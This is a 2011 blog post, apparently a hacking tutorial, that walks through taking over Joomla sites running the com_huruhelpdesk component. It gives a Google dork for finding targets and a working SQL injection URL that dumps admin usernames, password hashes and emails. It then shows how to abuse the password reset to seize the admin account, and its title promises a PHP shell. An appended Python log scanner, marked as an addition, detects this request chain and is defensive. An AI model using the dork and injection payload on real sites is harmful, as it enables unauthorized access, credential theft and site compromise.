Friday, September 2, 2011

step by step SQL Injection "joomla"

**************************************************************************************
* title : exploit joomla : com_huruhelpdesk + reset password + install PHP shell





==========
[+] step 1
==========

Open Google and type the keyword:
"inurl:/index.php?option=com_huruhelpdesk\"


Test the results one by one.
Let's take this one.


[Image: 1-2.jpg]

==========
[+] step 2
==========

Apply the exploit:

/index.php?option=com_huruhelpdesk&view=detail&cid[0]=-1/**/union/**/select/**/1,2,3,concat(username,0x3a,password,0x3a,email),5,6,7+from+jos_users--

[Image: 2.jpg]
  
There's the admin... :P
It's visible..


==========
[+] step 3
==========

Let's try resetting its password.



/index.php?option=com_user&view=reset
 
[Image: 3.jpg]
 
 enter..



==========
[+] step 4
==========

It asks for an activation too.
Hmm.. now what?
Relax.. let's find the activation first.



[Image: 4.jpg]



There, the activation comes out.
hehehe
:)
Moving on...




==========
[+] step 5
==========

Just copy-paste it into the earlier form.. enter.. :)

[Image: 5.jpg]


:P



==========
[+] step 6
==========

hahaha
It asks for a new password.. just give it one..
hehehe

[Image: 6.jpg]


 
==========
[+] step 7
==========

OK, now just go straight into the admin..
:)

http://[site]/[path]/administrator


[Image: 7.jpg]






Feel free to get creative on your own :)
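
A defender's view of the request chain in steps 2 and 3, as an added example that is not part of the original post: a Python scan of web access logs that flags com_huruhelpdesk requests whose cid[] value is not a plain integer, and then password-reset page hits from the same client. The log lines are constructed, and the combined log format and integer-only record ids are assumptions.

```python
import re
from urllib.parse import urlsplit, parse_qsl

# Constructed sample lines in combined log format (not from a real server).
SAMPLE_LOG = """\
198.51.100.7 - - [02/Sep/2011:10:00:01 +0000] "GET /index.php?option=com_huruhelpdesk&view=detail&cid[0]=12 HTTP/1.1" 200 5120
203.0.113.9 - - [02/Sep/2011:10:01:13 +0000] "GET /index.php?option=com_huruhelpdesk&view=detail&cid[0]=-1/**/union/**/select/**/1,2,3,concat(username,0x3a,password,0x3a,email),5,6,7+from+jos_users-- HTTP/1.1" 200 7344
203.0.113.9 - - [02/Sep/2011:10:02:40 +0000] "GET /index.php?option=com_user&view=reset HTTP/1.1" 200 4096
198.51.100.7 - - [02/Sep/2011:10:05:00 +0000] "GET /index.php?option=com_user&view=reset HTTP/1.1" 200 4096
"""

LINE_RE = re.compile(r'^(\S+) \S+ \S+ \[[^\]]+\] "\S+ (\S+) [^"]*"')
CID_KEY = re.compile(r"^cid(\[\d*\])?$")   # cid, cid[], cid[0], ...
INT_ONLY = re.compile(r"[0-9]+")           # assumption: record ids are plain integers


def scan(log_text):
    """Return (ip, finding, detail) tuples for suspicious requests, in log order."""
    findings, flagged_ips = [], set()
    for line in log_text.splitlines():
        m = LINE_RE.match(line)
        if not m:
            continue
        ip, target = m.groups()
        # parse_qsl URL-decodes values, so encoded payloads are compared in clear form
        params = parse_qsl(urlsplit(target).query, keep_blank_values=True)
        query = dict(params)
        if query.get("option") == "com_huruhelpdesk":
            for key, value in params:
                # Anything other than digits in cid[] is not a legitimate ticket id
                if CID_KEY.match(key) and not INT_ONLY.fullmatch(value):
                    findings.append((ip, "non_numeric_cid", value[:40]))
                    flagged_ips.add(ip)
        elif (query.get("option") == "com_user" and query.get("view") == "reset"
              and ip in flagged_ips):
            # Reset page requested by a client that already sent a bad cid[]
            findings.append((ip, "reset_after_injection", target))
    return findings


if __name__ == "__main__":
    for finding in scan(SAMPLE_LOG):
        print(finding)
```

Log matching only tells you the request happened; the lasting fix is for the component to cast every cid value to an integer before it reaches the query.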
